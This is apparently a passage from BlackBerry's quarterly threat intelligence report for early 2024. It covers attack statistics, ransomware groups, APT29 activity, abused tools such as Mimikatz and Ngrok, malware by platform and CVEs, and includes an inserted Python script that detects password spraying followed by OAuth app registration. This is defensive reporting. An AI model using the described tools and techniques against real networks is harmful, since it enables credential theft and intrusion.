Global Threat Intelligence Report

June 2024 Edition

Reporting Period: January 1 – March 31, 2024

Actionable Intelligence That Matters

This BlackBerry report provides a comprehensive review of the global threat landscape for the period covering January through March 2024. Report highlights include:

We observed over 630,000 malicious hashes, a per-minute increase of over 40 percent over the previous reporting period.

Read more in the Total Attacks This Period section.

60 percent of all attacks were on critical infrastructure. Of those, 40 percent targeted the financial sector.

Find the details in the Critical Infrastructure section.

56 percent of CVEs were rated 7.0 or higher (with 10 being the most severe). CVEs have been rapidly weaponized in all forms of malware — especially ransomware and infostealers.

Learn more in the Common Vulnerabilities and Exposures section.

New Ransomware Section: We’ve included a new section on the top ransomware groups around the world and the most active ransomware this reporting period.

Learn more in the Who’s Who in Ransomware section.

The BlackBerry® Global Threat Intelligence Reports are published every three months. These frequent updates enable CISOs and other key decision makers to stay informed about the most recent cybersecurity threats and challenges in their industries and geographic locations.

The report is the culmination of the research, analysis, and conclusions of our Cyber Threat Intelligence (CTI) team, our Incident Response (IR) team, and security specialists in our CylanceMDR division. Continue scrolling to learn more, download the pdf, or read the executive brief.

Total Attacks This Period

From January to March 2024, BlackBerry cybersecurity solutions stopped over 3,100,000 cyberattacks: this equates to over 37,000 cyberattacks stopped per day. Additionally, we observed an average of 7,500 unique malware samples per day targeting our customer base.
Figure 1: Unique malware hashes per minute encountered. (*The Sept 2023 – Dec 2023 period covered 120 days.)

As you will notice in this report, total attacks do not necessarily correlate with the number of unique hashes (new malware). As figures 2 through 6 in the next two sections illustrate, not every attack utilizes unique malware. It depends on the attacker’s motivation, the complexity of the attack, and the goal — e.g., information stealing or financial theft.

Attacks By Country

Attacks Stopped

Figure 2 below shows the top five nations where BlackBerry cybersecurity solutions prevented the most cyberattacks. Organizations utilizing BlackBerry solutions in the United States received the most attempted attacks this reporting period. In the Asia-Pacific (APAC) region, Japan, South Korea and Australia also experienced a high level of attacks, earning them spots within our top five. In Latin America (LATAM), customers in Honduras were heavily targeted, earning that country the fifth spot on our list.


Unique Malware

This reporting period, BlackBerry observed over a 40 percent per-minute increase in novel hashes (unique malware), compared to the September through December 2023 period (Figure 1). Figure 2 shows the five countries where BlackBerry cybersecurity solutions recorded the highest number of unique malware hashes, with the United States receiving the greatest number. South Korea, Japan, and Australia in the Asia-Pacific region retained their rankings from the last three-month period, while Brazil joins the list as a new entry.

Figure 2: Attacks stopped and unique malware encountered, ranked by country.
Again, as you compare figures 3a and 3b, you will see that total attacks stopped does not necessarily correlate with the number of unique hashes recorded. Unique, custom tools and tactics might be developed by a highly resourced threat actor that wants to attack a specific, high-value target like a CFO of a particular company. Deepfakes are increasingly used to target specific victims, such as using a deepfake voice recording of a CEO to convince that company’s finance manager to transfer money.
Figure 3a: Attacks stopped, ranked for top five countries impacted this reporting period, versus the previous report.
Figure 3b: Unique hashes, ranked for top countries impacted this reporting period, versus the previous report.

As we'll see in the next sections, other attackers may want to damage physical infrastructure, such as a public utility, by exploiting a vulnerability in the control systems or by infecting a device on the network.

Attacks By Industry

As in our previous report, we have consolidated several key industry sectors under two umbrella sections: Critical Infrastructure and Commercial Enterprise.

Critical infrastructure, as defined by the Cybersecurity and Infrastructure Security Agency (CISA), encompasses 16 sectors including healthcare, government, energy, agriculture, finance and defense.

The increasing digitization of these sectors means their assets are more vulnerable to cybercriminals. Threat actors actively exploit critical systems via vulnerabilities such as system misconfigurations and social engineering campaigns against employees.

Commercial enterprises include manufacturing, capital goods, commercial and professional services, and retail. Businesses are always tempting targets for cyberattacks, and the increased use of connected devices and cloud computing has made it easier to breach their systems. Attackers have also become more sophisticated, often using social engineering to obtain account credentials and distribute malware.

Figure 4: Industry-specific attacks stopped versus unique malware.
Cyber Story Highlight: International Banks

Mexican Banks and Cryptocurrency Platforms Targeted with AllaKore RAT

In January, BlackBerry cyberthreat analysts uncovered a long-running, financially motivated campaign targeting Mexican banks and cryptocurrency trading platforms with the AllaKore RAT, a modified open-source remote access tool. The threat actors used lures mimicking the Mexican Social Security Institute (IMSS) and legitimate documents to distract users during the installation process, allowing them to steal banking credentials and authentication information. This campaign has been ongoing since 2021, focusing on large Mexican companies with revenues exceeding $100 million. BlackBerry's findings suggest that the threat actor is likely based in Latin America, given the use of Mexico Starlink IPs and Spanish-language instructions in the RAT payload. Read the full article on our blog to learn more.

Critical Infrastructure Threats

Based on our internal telemetry, of those cyberattacks that BlackBerry cybersecurity solutions encountered that were industry-specific, 60 percent were targeted against critical infrastructure. Additionally, 32 percent of unique malware hashes targeted critical infrastructure tenants.

CylanceENDPOINT and other BlackBerry cybersecurity solutions stopped over 1.1 million attacks against critical industry sectors, which include finance, healthcare, government and utilities. Almost half of these 1.1 million attacks were in the finance sector. Additionally, government and public sector organizations experienced the greatest diversity of attacks, with over 36 percent of unique hashes targeting this sector.

Figure 5: Breakdown of attacks stopped and unique malware targeting critical infrastructure.


BlackBerry telemetry recorded several prevalent malware families targeting critical infrastructure around the globe. For instance, the notorious infostealer LummaStealer was observed specifically targeting the food and agriculture industries in Latin America and the energy sector in the APAC region. Notable threats observed during this reporting period included:

  • 8Base ransomware: Ransomware operation | Healthcare sector
  • Amadey (Amadey Bot): Multifunctional botnet | Government facilities
  • Buhti: Ransomware operation | Commercial real estate
  • LummaStealer (LummaC2): C-based infostealer | Food and agriculture sector (LATAM) and energy sector (APAC)
  • PrivateLoader: Downloader family | Energy sector
  • Remcos (RemcosRAT): Commercial-grade remote access tool (RAT) | Food and agriculture sector
  • Vidar (VidarStealer): Commodity infostealer | Various sectors:
    • The energy sector in APAC countries
    • The IT sector in LATAM countries
    • The financial services sector in North America
    • The government facilities sector in Europe, the Middle East and Africa (EMEA)

Details on these threats to critical infrastructure are available in the Appendix.

Figure 6: Prevalent critical infrastructure threats by region.


External Threats Faced by Critical Infrastructure

External threats are cyberattacks recorded outside of BlackBerry’s internal telemetry. During this last reporting period, the broader global threat landscape saw a number of notable attacks against critical infrastructure.

Ramifications continue from the late 2023 breach at the U.S.-based Idaho National Laboratory (INL), a research facility for the U.S. Department of Energy (DOE). Attackers breached the laboratory's cloud-based HR management platform Oracle HCM and siphoned the personal data of over 45,000 people. The hacktivist group SiegedSec claimed responsibility for the attack in the weeks following and posted a portion of the stolen data on an online leak forum. Figure 7 provides a timeline of notable threats against critical infrastructure that occurred during this reporting period.

Figure 7: Notable external attacks against critical infrastructure.
Cyber Story Highlight: Infrastructure, VPNs, and Zero Trust

Emergency Directive Reveals It May Be Time to Replace VPNs

The core functionality of virtual private networks (VPNs) has remained largely unchanged since their inception in 1996, but recent high-profile security breaches and government directives suggest it may be time to reconsider their use.

A key issue is VPNs' "trust but verify" model, which inherently grants trust to users within the network perimeter, making them vulnerable to cyberattacks. Highlighting this risk, the Cybersecurity and Infrastructure Security Agency (CISA) recently issued emergency directives addressing critical VPN vulnerabilities, urging rapid disconnection of at-risk products. Read the full story on our blog.

Commercial Enterprise Threats

Just as industries are impacted by cybersecurity threats, individual companies also battle cyberattacks, especially as they tend to rely more on digital infrastructure for finance, communications, sales, procurement and other business operations. Everything from start-ups to multinational conglomerates are susceptible to cyberthreats, particularly ransomware.

Throughout the last reporting period, BlackBerry cybersecurity solutions blocked 700,000 attacks targeting industries within the commercial enterprise sector.

Based upon our internal telemetry, compared to the previous reporting period, commercial enterprises saw:

  • a two percent increase in the number of attacks they faced.
  • a 10 percent jump in unique hashes encountered.
Figure 8: Attacks stopped and unique malware in the commercial enterprise space.


Commercial enterprises face threats from infostealers sold via malware as a service (MaaS) operations. Often, these threats deploy additional malware onto a victim’s device. They continue to evolve in a cyber arms race to circumvent security products and traditional antivirus (AV) software. The prevalent malware noted in BlackBerry telemetry includes:

  • RedLine (RedLine Stealer): Infostealer
  • SmokeLoader: Commonly utilized and versatile malware
  • PrivateLoader: Malware facilitator
  • RaccoonStealer: MaaS infostealer
  • LummaStealer (LummaC2): Malware infostealer

Details on these threats to commercial enterprises are available in the Appendix.

Figure 9: Prevalent commercial enterprise threats by region.


External Threats Faced by Commercial Enterprise

Ransomware is a prevalent scourge against organizations of all sizes and business orientations. Recent examples of ransomware attacks include:

  • VF Corporation — a U.S. manufacturer of well-known sportswear brands such as Timberland, The North Face, and Vans — was the victim of a ransomware attack by the ALPHV ransomware gang in December 2023. The attackers stole the data of over 35 million customers, causing delays in order fulfilment and other disruptions during the all-important holiday season.
  • Coop Värmland, a Swedish supermarket chain, had its busy holiday period disrupted by a ransomware attack perpetrated by the Cactus ransomware gang.
  • A well-known German manufacturer, ThyssenKrupp, suffered a breach in its automotive subdivision in February 2024. The company later said the attack was a failed ransomware attack.
  • In March, the Stormous ransomware group attacked the Belgian Duvel Moortgat Brewery, a producer of over 20 brands of beer, and stole 88 GB of data.

Who’s Who in Ransomware

As the above events highlight, ransomware has been a prevalent threat across the BlackBerry Global Threat Intelligence Report. For this report, we’ve introduced a section specifically about ransomware groups active in this reporting period.

Ransomware is a universal tool adopted by cyber-criminals and organized syndicates alike, targeting victims in all industries around the globe. Most of these groups are financially motivated; they quickly adapt new tactics and techniques to evade traditional cybersecurity defenses and will rapidly exploit any new security vulnerabilities.

Ransomware is increasingly targeting healthcare organizations, a concerning trend. Healthcare is a profitable sector for ransomware groups due to the increasing digitization of healthcare records and the severe consequences that can occur if these services are disrupted. With notable attacks happening globally during this reporting period, these aggressive syndicates can endanger lives and restrict or cut off healthcare workers’ access to patients' crucial personal identifiable information (PII) data. 

Attacks on healthcare can have serious knock-on effects, crippling hospitals, clinics, pharmacies and drug dispensaries; preventing patients from obtaining vital medications; causing ambulances to be re-routed; and disrupting the scheduling of medical procedures. Secondary impacts include data leakage and sensitive patient PII being sold on the dark web. For this reason, we predict healthcare will continue to be heavily targeted both publicly and privately throughout 2024.

Key Ransomware Players This Reporting Period

Following are notable ransomware threat groups from around the globe who were active this reporting period:

Figure 10: Notable ransomware groups/families active January to March 2024.


Hunters International
Hunters International, a ransomware as a service (RaaS) crime syndicate that’s been in operation since late 2023, rose to prominence in early 2024. The group is possibly a spin-off of the Hive ransomware group, which was shuttered by law enforcement in early 2023. This group employs a double extortion scheme that involves first encrypting the victim’s data for ransom, then demanding more money by threatening to publicly post the stolen data. Hunters International is currently active around the globe.

8Base
Initially observed in 2022, the 8Base ransomware group rose to prominence in late 2023. This prolific group uses a variety of tactics, techniques and procedures (TTPs) and can be highly opportunistic. The group is often quick to exploit newly disclosed vulnerabilities and leverages various ransomware, including Phobos.

LockBit
LockBit, a Russia-based ransomware group, specializes in providing RaaS through its eponymous malware. Discovered in 2020, LockBit ransomware has become one of the most aggressive ransomware groups. Aspects include:

  • Custom tooling to exfiltrate victim data prior to encryption and host it via a leak site on the dark web.
  • Largely targets victims in North America and, secondarily, in LATAM.
  • Employs a double extortion strategy.

In February 2024, Operation Cronos, an international law enforcement effort, disrupted LockBit’s operations. However, LockBit appears to have since bounced back, and remains a major player in the ransomware space.

Play
Observed initially in 2022, Play is a multi-extortion ransomware group that hosts stolen data on TOR-based sites that enable anonymous communication, threatening that the data will be leaked if the ransom payment isn’t made. Play often targets small and medium businesses (SMBs), mainly in North America, but also in the EMEA region during this reporting period. The group largely leverages off-the-shelf tools like Cobalt Strike, Empire and Mimikatz for discovery and lateral movement TTPs. The group also utilized Grixba, a custom recon and infostealing tool that is used prior to ransomware execution.

BianLian
BianLian is a GoLang-based ransomware that has been in the wild since 2022. The associated group has been active this reporting period, heavily targeting victims based in North America. Like many ransomware groups, BianLian is highly exploitive of recently disclosed vulnerabilities, often targeting smaller companies across a number of industries. It uses various off-the-shelf tools including PingCastle, Advanced Port Scanner and SharpShares to gain a foothold on a target system before exfiltrating sensitive data and executing ransomware. This stolen data is then leveraged as an extortion tactic until the ransom is paid.

ALPHV
Often referred to as BlackCat or Noberus, ALPHV is a RaaS operation that has been around since late 2021. The threat group behind ALPHV is highly sophisticated, leveraging the Rust programming language to target Windows, Linux and VMware-based operating systems. ALPHV tends to target North American victims.

Cyber Story Highlight: Ransomware and Healthcare

12 Days Without Revenue: Ransomware Fallout Continues in Healthcare Sector

In March, the healthcare sector experienced an "unprecedented" ransomware attack that disrupted operations across hospitals and pharmacies, according to the American Hospital Association (AHA). The attack on Change Healthcare, which processes 15 billion health care transactions annually, severely affected patient care services such as clinical decision support and pharmacy operations. This disruption led to a 12-day revenue standstill for impacted medical practices and left patients struggling to access vital prescriptions. With the U.S. Department of Health and Human Services’ Office for Civil Rights now investigating, the latest data reveals a significant rise in cyber-threats, with a 256% increase in large hacking breaches over the past five years. The incident underscores the critical need for enhanced cybersecurity measures in the healthcare industry. For a detailed exploration of this pressing issue, read the full story on our blog.

Geopolitical Analysis and Comments

Geopolitical conflicts increasingly drive cyberattacks. Digital technologies can be powerful tools for good, but they can also be abused by state and non-state actors. In the first three months of 2024, lawmakers across Europe, North America and the Asia-Pacific region fell victim to targeted spyware campaigns. Threat actors broke into the IT systems of multiple government departments, compromised military systems, and disrupted critical infrastructure around the world.

While the motives driving these intrusions are often complex and opaque, the most significant, recent incidents involved major geopolitical divides such as Russia’s invasion of Ukraine, mounting aggression between Israel and Iran, and ongoing tensions in the South China Sea and the Indo-Pacific region.

In Ukraine, the cyber dimensions of the war continue to grind on. Contrary to international norms governing lawful conduct in cyberspace, attacks launched against Ukraine continue to fail to distinguish between civilian and military infrastructure. In January, Russian agents tapped into residential webcams in Kyiv allegedly to gather information on the city’s air defense systems before launching a missile attack on the city. Per reports, the attackers manipulated camera angles to gather information on nearby critical infrastructure for more precise missile targeting.

Russian cyberthreat actors were also linked to an attack against Ukraine’s largest mobile phone provider, Kyivstar, destroying significant infrastructure and cutting off access to 24 million customers in Ukraine. This attack came just hours before President Biden met with President Zelenskyy in Washington D.C. Lawmakers in the EU also discovered that their phones had been infected with spyware. Many of these lawmakers were members of the European Parliament’s security and defense subcommittee, responsible for making recommendations on EU support to Ukraine. In March, Russian attackers also intercepted conversations between German military officials about potential military support to Ukraine, reinforcing the need to protect communications from increased espionage attempts.

As military activity between Iran and Israel has escalated, so have cyberattacks against Israeli government sites. In retaliation, Israeli threat actors disrupted 70 percent of gas stations across Iran. Meanwhile, the U.S. launched a cyberattack against an Iranian military spy ship in the Red Sea that was sharing intelligence with Houthi rebels.

In the Indo-Pacific region, cyberattacks and espionage campaigns attributed to Chinese-backed groups continued to mount. The U.S. Department of Homeland Security’s Cyber Safety Review Board released a major report about the Microsoft Online Exchange Incident from the summer of 2023 and documented in detail how Chinese-backed attackers stole source code from Microsoft. The threat group Storm-0558 compromised employees and officials in the U.S. Department of State, the U.S. Department of Commerce, the U.S. House of Representatives, and several government departments in the UK. According to the report, the threat actor managed to download approximately 60,000 emails from the State Department alone.

This was not an isolated incident. In March 2024, the U.S. Department of Justice and the FBI revealed that Chinese attackers had targeted several UK, EU, U.S. and Canadian members of the Interparliamentary Alliance on China.

As noted earlier, attacks against critical infrastructure have risen, particularly in the financial and healthcare sectors. In the first three months of 2024, a massive data breach of a French health insurance company led to the leak of sensitive personal information. In Canada, the Financial Transactions and Reports Analysis Center (FINTRAC) shut down its systems after a cyber incident. In response, the Canadian government allocated CAN$27 million to enhance FINTRAC’s cyber resiliency and construct data security safeguards.

Governments around the world are investing in stronger cybersecurity in the face of increased cyber espionage and cyberattack attempts. Canada recently announced historic levels of investment in its cyber defenses, and the UK increased its defense spending to 2.5 percent of GDP. Cybersecurity remains one of the top risks for governments and private sector actors alike, and this trend will likely continue so long as geopolitical tensions continue to rise.

Incident Response Observations

Incident response (IR) is an enterprise-level approach to managing cyberattacks and cybersecurity incidents. The goal of incident response is to quickly contain and minimize damage caused by a breach, as well as reducing recovery time and costs. Every organization needs an IR plan and either an in-house or third-party IR service. BlackBerry® Cybersecurity Services — which includes cyber incident response, data breach response, business email compromise response, ransomware response, and digital forensics — provides rapid incident response plans to help mitigate the impact of any cyberattack and ensure that digital recovery follows best practices.
Figure 11: BlackBerry IR engagement breakdown.


Observations of the BlackBerry Incident Response Team

This is a summary of the types of IR engagements the BlackBerry team responded to, as well as security measures organizations can take to prevent such breaches.

  • Network Intrusion: Incidents in which the initial infection vector was a vulnerable, Internet-facing system, such as a web server or a virtual private network (VPN) appliance. In some cases, the breach led to the deployment of ransomware within the target's environment and the exfiltration of data.
    • Prevention: Apply security updates to all Internet-exposed systems in a timely manner. (MITRE – External Remote Services, T1133.)
  • Insider Misconduct: A current and/or former employee accessed company resources without authorization.  
    • Prevention: Implement strong authentication security controls on all systems. Implement formal company employee offboarding procedures. (MITRE – Valid Accounts: Cloud Accounts, T1078.004.)
  • Ransomware: Ten percent of all incidents responded to were ransomware-based.
    • Prevention: Patch Internet-facing services such as email, VPNs, and web servers in a timely fashion. This can prevent a threat actor from accessing and further actioning on objectives, such as deploying ransomware, after gaining access to an enterprise network via a vulnerable device or system. (MITRE – External Remote Services, T1133.)
    • Prevention: Ensure the organization has two copies of all critical data stored in two different media formats from the original data source, with at least one copy off-site.

Detecting, containing and recovering from a cybersecurity incident requires rapid detection and response to limit damage. It is imperative that organizations have a well-documented incident response plan in place, along with trained personnel and resources ready to take immediate action at the first signs of a potential breach. This ensures that security teams can detect issues as early as possible, quickly contain and eradicate threats, and mitigate business and brand reputation impacts, monetary losses, and legal risks to the organization.

Threat Actors and Tooling

Threat Actors

Dozens of threat groups mounted cyberattacks in the first three months of 2024. We have highlighted the most impactful attacks here.

LockBit

LockBit is a cybercriminal group with affiliations to Russia. The group's operators diligently maintain and enhance their eponymous ransomware, overseeing negotiations and orchestrating its deployment once a successful breach happens. Employing double extortion strategies, LockBit ransomware not only encrypts local data to restrict victim access but also exfiltrates sensitive information and threatens to publicly expose it unless a ransom is paid.

In February, the NCA, the FBI, and Europol, through a coordinated global effort named “Operation Cronos,” collaborated with law enforcement agencies across 10 countries to take control of the LockBit group’s infrastructure and leak site, gather information from their servers, make arrests, and impose sanctions.

However, less than one week later, the ransomware group regrouped and resumed its attacks, employing updated encryptors and ransom notes that direct victims to new servers following the law enforcement disruption.

LockBit claimed responsibility for cyberattacks against various networks, including the Capital Health hospital network. In both instances, they threatened to release confidential data unless prompt ransom payments were made.

Rhysida

Rhysida is a relatively new RaaS group that was first observed towards the end of May 2023. Despite its relatively recent emergence, the group quickly established itself as a viable ransomware threat. Its first high-profile attack targeted the Chilean Army, marking the start of a rise in ransomware attacks on Latin American government institutions.

The Rhysida group also attacked yacht retailer MarineMax, exfiltrating a limited amount of data from the company's environment, including customer and employee information such as PII that can be used for identity theft. This stolen data is now being offered for sale on the dark web for 15 BTC — approximately U.S. $1,013,556 at the time of writing. Additionally, Rhysida released screenshots purportedly showing MarineMax's financial documents, along with images of employee driver's licenses and passports, on its dark web leak site.

APT29

APT29, also known as Cozy Bear, Midnight Blizzard, or NOBELIUM, is a threat group attributed to Russia’s Foreign Intelligence Service (SVR). APT29 is known for targeting governments, political and research organizations, as well as critical infrastructure.

CISA recently warned that APT29 has expanded its targeting to include additional industries and more local governments. Known to use a wide range of custom malware, the threat group has also recently targeted cloud services using compromised service accounts or stolen authentication tokens.

In this reporting period, APT29 was observed accessing a Microsoft test tenant account following a password spray attack, then creating malicious OAuth applications to access corporate email accounts. Furthermore, they targeted German political parties with WINELOADER, a backdoor first observed in January 2024.
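The APT29 sequence above (a password spray, a single successful sign-in, then an OAuth app registration by that account) has a detectable shape in sign-in and audit logs. The following is an added detection example written for this report, not BlackBerry's or Microsoft's code; the pipe-delimited log format, the event names and all sample values are constructed assumptions.

```python
"""Detect a password spray followed by an OAuth application registration.

Added example for the APT29 observation in this report. The log layout
(ts|source_ip|user|event|result), the event names "signin" and
"app_registered", and every IP and account below are constructed for the
example and do not come from any real tenant."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). The first source tries one
# password against many accounts, succeeds on one, then registers an app.
# The second source is a single user mistyping their own password.
SAMPLE_LOG = """\
2024-01-12T02:00:05|203.0.113.7|alice@corp.example|signin|failure
2024-01-12T02:00:09|203.0.113.7|bob@corp.example|signin|failure
2024-01-12T02:00:14|203.0.113.7|carol@corp.example|signin|failure
2024-01-12T02:00:20|203.0.113.7|dave@corp.example|signin|failure
2024-01-12T02:00:26|203.0.113.7|erin@corp.example|signin|failure
2024-01-12T02:00:31|203.0.113.7|test-tenant-admin@corp.example|signin|success
2024-01-12T02:15:44|203.0.113.7|test-tenant-admin@corp.example|app_registered|success
2024-01-12T08:30:00|198.51.100.4|alice@corp.example|signin|failure
2024-01-12T08:30:07|198.51.100.4|alice@corp.example|signin|failure
2024-01-12T08:30:15|198.51.100.4|alice@corp.example|signin|success
"""


def parse_log(text):
    """Parse the constructed pipe-delimited format into time-sorted dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, event, result = line.split("|")
        events.append({"ts": datetime.fromisoformat(ts), "ip": ip,
                       "user": user, "event": event, "result": result})
    return sorted(events, key=lambda e: e["ts"])


def detect_password_spray(events, window=timedelta(minutes=30),
                          min_accounts=5, max_per_account=3):
    """Return {source_ip: sorted sprayed accounts} for sources whose failed
    sign-ins within one sliding window touch at least min_accounts distinct
    users with no more than max_per_account failures each. The low
    per-account count is what separates a spray (which stays under lockout
    thresholds) from brute force or a user mistyping a password."""
    failures = defaultdict(list)
    for e in events:
        if e["event"] == "signin" and e["result"] == "failure":
            failures[e["ip"]].append(e)
    hits = {}
    for ip, evs in failures.items():
        for i, start in enumerate(evs):
            in_window = [x for x in evs[i:] if x["ts"] - start["ts"] <= window]
            per_user = defaultdict(int)
            for x in in_window:
                per_user[x["user"]] += 1
            if (len(per_user) >= min_accounts
                    and max(per_user.values()) <= max_per_account):
                hits[ip] = sorted(per_user)
                break
    return hits


def detect_spray_then_app_registration(events, spray_sources,
                                       follow_window=timedelta(hours=24)):
    """For each successful sign-in from a spray source, look for an
    app_registered event by the same account within follow_window.
    Returns a list of (source_ip, user, registration timestamp)."""
    findings = []
    for e in events:
        if (e["ip"] in spray_sources and e["event"] == "signin"
                and e["result"] == "success"):
            for f in events:
                if (f["user"] == e["user"] and f["event"] == "app_registered"
                        and timedelta(0) <= f["ts"] - e["ts"] <= follow_window):
                    findings.append((e["ip"], e["user"], f["ts"].isoformat()))
                    break
    return findings


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    sprays = detect_password_spray(evs)
    print("spray sources:", sprays)
    print("spray -> app registration:",
          detect_spray_then_app_registration(evs, sprays))
```

Tune `min_accounts` and `window` to the tenant's normal failure volume; the second stage is the higher-confidence alert because it ties the spray to a post-compromise action.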

Akira

First seen in early 2023, Akira ransomware has been observed targeting organizations across all industries. By accessing networks with misconfigured or vulnerable VPN services, public facing RDP, spear-phishing, or compromised credentials, they attempt to create domain accounts or find credentials for privilege escalation or lateral movement within networks.

Akira has been known to use tools such as:

  • AdFind for querying Active Directory.
  • Mimikatz and LaZagne for accessing credentials.
  • Ngrok for tunneling into networks behind firewalls or other security measures.
  • AnyDesk for remote access.
  • Advanced IP Scanner for locating devices on a network.

Key Tools Used by Threat Actors

Mimikatz

Mimikatz is recognized for its ability to extract sensitive credentials from the Local Security Authority Subsystem Service (LSASS) process on Windows systems. This process serves as the repository for user credentials post-login, making it a prime target for both ethical penetration testers and malicious actors alike. Mimikatz is a popular utility for assessing the robustness of Windows networks. Legitimate penetration testers can use Mimikatz to uncover critical vulnerabilities, while malicious threat actors can use it to escalate privileges or traverse laterally within networks. Threat groups such as LockBit and Phobos exploit its capabilities to execute sophisticated cyberattacks.

Cobalt Strike

Cobalt Strike, an adversary simulation framework, replicates the persistent presence of threat actors within network environments. The tool has two pivotal components: an agent (Beacon) and a server (Team Server). The Team Server, functioning as a long-term C2 server hosted on the Internet, maintains constant communication with Beacon payloads deployed on compromised machines.

While Cobalt Strike is primarily used by penetration testers and red teams to assess the security posture of networks, it has also been exploited by threat actors. The code for Cobalt Strike 4.0 was leaked online in late 2020, leading to its rapid weaponization by a diverse array of malicious adversaries. The dual nature of Cobalt Strike highlights the importance of vigilance and robust cybersecurity measures to mitigate the risks associated with its misuse, safeguarding networks from potential exploitation.

Ngrok

Ngrok is a platform for exposing internal systems to the Internet. It provides tunneled access to a network or device behind firewalls. After establishing an Internet-visible endpoint, traffic going to that endpoint is then sent through Transport Layer Security (TLS) tunnels to the corresponding Ngrok agent in the internal network. This allows for activities such as rapid ad-hoc testing of systems or remote administration.

However, this functionality also makes it an attractive tool for attackers, providing a secure channel for command-and-control (C2) and exfiltration. In the past it has been used by threat groups such as ALPHV, Lazarus and Daixin Team.

ConnectWise

ConnectWise ScreenConnect is a remote desktop administration tool widely used by technical support, managed services providers (MSPs), and other professionals to authenticate machines. 
Threat actors can abuse ScreenConnect to infiltrate high-value endpoints and exploit privileges. ConnectWise has recently addressed two major security issues (CVE-2024-1709 and CVE-2024-1708) that could potentially enable anonymous attackers to exploit an authentication bypass flaw and create admin accounts on publicly exposed instances.  

Prevalent Threats by Platform: Windows

Remcos

Remote Access Trojan

Remcos, short for Remote Control and Surveillance, is an application used to remotely access a victim’s device.

Agent Tesla

Infostealer

Agent Tesla is a .NET based Trojan that is often seen sold as a MaaS and is used primarily for credential harvesting.

RedLine

Infostealer

RedLine malware utilizes a wide range of applications and services to illicitly exfiltrate victims’ data, such as credit card information, passwords, and cookies.

RisePro

Infostealer

While updated variations of RisePro were observed in our last report, the infostealer was seen in a new campaign being falsely distributed as “cracked software” on GitHub repositories during this reporting period.

SmokeLoader

Backdoor

SmokeLoader is a modular malware used to download other payloads and steal information. It was originally observed in 2011 but remains an active threat to this day.

Prometei

Cryptocurrency Miner/Botnet

Prometei is a multi-stage cross-platform cryptocurrency botnet primarily targeting Monero coins. It can adjust its payload to target either Linux or Windows platforms. Prometei has been seen used alongside Mimikatz to spread to as many endpoints as possible.

Buhti

Ransomware

Buhti is a ransomware operation that utilizes existing variations of other malware such as LockBit or Babuk to target Linux and Windows systems.

Prevalent Threats by Platform: Linux

XMRig

Cryptocurrency Miner

XMRig continues to be prevalent during this reporting period. The miner targets Monero while enabling the threat actor to use a victim’s system to mine cryptocurrency without their knowledge.

NoaBot/Mirai

Distributed Denial of Service (DDoS)

NoaBot is a slightly more sophisticated Mirai variant. It boasts improved obfuscation techniques compared to Mirai and uses SSH to spread as opposed to Telnet. It is also compiled with uClibc instead of GCC, making detection difficult.

XorDDoS

DDoS

Frequently observed in our telemetry, XorDDoS is a Trojan malware that targets Internet-facing devices running Linux and coordinates infected botnets via C2 instructions. It gets its name from using XOR encryption to control access to execution and communication data.

AcidPour

Wiper

Although not present in our own telemetry, a new version of the data wiper AcidPour has been seen in the wild. The latest version of the malware, which is utilized to wipe files on routers and modems, is designed to specifically target Linux x86 devices.

Prevalent Threats by Platform: MacOS

RustDoor

Backdoor

RustDoor is a Rust-based backdoor malware which is primarily distributed by being disguised as updates for legitimate programs. The malware spreads as FAT binaries containing Mach-o files.

Atomic Stealer

Infostealer

Atomic Stealer (AMOS) remains prevalent with a new version spotted in the wild. The latest version of the stealer drops a Python script to aid in remaining undetected. AMOS targets passwords, browser cookies, autofill data, crypto wallets and Mac keychain data.

Empire Transfer

Infostealer

An infostealer discovered by Moonlock Lab in February 2024. It can “self-destruct” when it detects that it is running in a virtual environment. This helps the malware remain undetected and makes analysis more difficult for defenders. Empire Transfer targets passwords, browser cookies and crypto wallets, and utilizes similar tactics to Atomic Stealer (AMOS).

Prevalent Threats by Platform: Android

SpyNote

Infostealer/RAT

SpyNote utilizes the Android Accessibility Service to capture user data and send captured data to a C2 server.

Anatsa/Teabot

Infostealer

Primarily distributed through the Google Play store as Trojan applications. After initial infection from the Trojan application, Anatsa downloads additional malicious files to the victim’s device from a C2 server.

Vultur

Infostealer/RAT

First discovered in 2021, Vultur has been distributed through Trojan applications and “smishing” (SMS phishing) social engineering techniques. In addition to data exfiltration, a threat actor can also make changes to the file system, modify execution permissions, and control the infected device using Android Accessibility Services.

Coper/Octo

Infostealer/RAT

A variant of the Exobot family. Packaged as a MaaS product, its capabilities include keylogging, SMS monitoring, screen control, remote access and C2 operation.

Common Vulnerabilities and Exposures

Common Vulnerabilities and Exposures (CVEs) provide a framework for identifying, standardizing and publicizing known security vulnerabilities and exposures. As mentioned earlier, cyber criminals are increasingly using CVEs to breach systems and steal data. This reporting period, new vulnerabilities found within Ivanti, ConnectWise, Fortra and Jenkins products offered bad actors new ways to target victims. In addition, the last few months have demonstrated the risks of supply chain attacks that could be present in open-source projects with the XZ backdoor, which had been intentionally planted in XZ Utils, a data compression utility available on almost all installations of Linux.

Almost 8,900 new CVEs were reported by the National Institute of Standards and Technology (NIST) from January through March. The base score combines several carefully calculated metrics into a single severity score from zero to 10. The dominant CVE base score was a “7,” which accounted for 26 percent of the total scores. This is an increase of three percent for this CVE score compared to the last reporting period. March holds the record so far this year for the most newly discovered CVEs, with close to 3,350 new CVEs. The Trending CVEs table references specific vulnerabilities listed in the NIST National Vulnerability Database.

Figure 12: Breakdown of CVE severity.

Trending CVEs

XZ Utils Backdoor

CVE-2024-3094 (10 Critical)
Unauthorized Access

This malicious code was embedded in XZ Utils version 5.6.0 and 5.6.1. The backdoor manipulated sshd, which would grant unauthenticated attackers unauthorized access to affected Linux distributions.

Ivanti Zero-Day Vulnerabilities

CVE-2024-21887 (9.1 Critical); CVE-2023-46805 (8.2 High); CVE-2024-21888 (8.8 High); CVE-2024-21893 (8.2 High)
Arbitrary Code Execution

Early this year, authentication bypass and command injection vulnerabilities were found within Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) products. If both were used in conjunction by a threat actor, this would allow them to craft malicious requests and to execute arbitrary commands on the system.

In January, Ivanti also warned about two more vulnerabilities affecting the products, CVE-2024-21888 (a privilege escalation vulnerability) and CVE-2024-21893 (a server-side request forgery vulnerability). Nation-state actors have exploited these zero-day vulnerabilities to deploy custom malware strains.

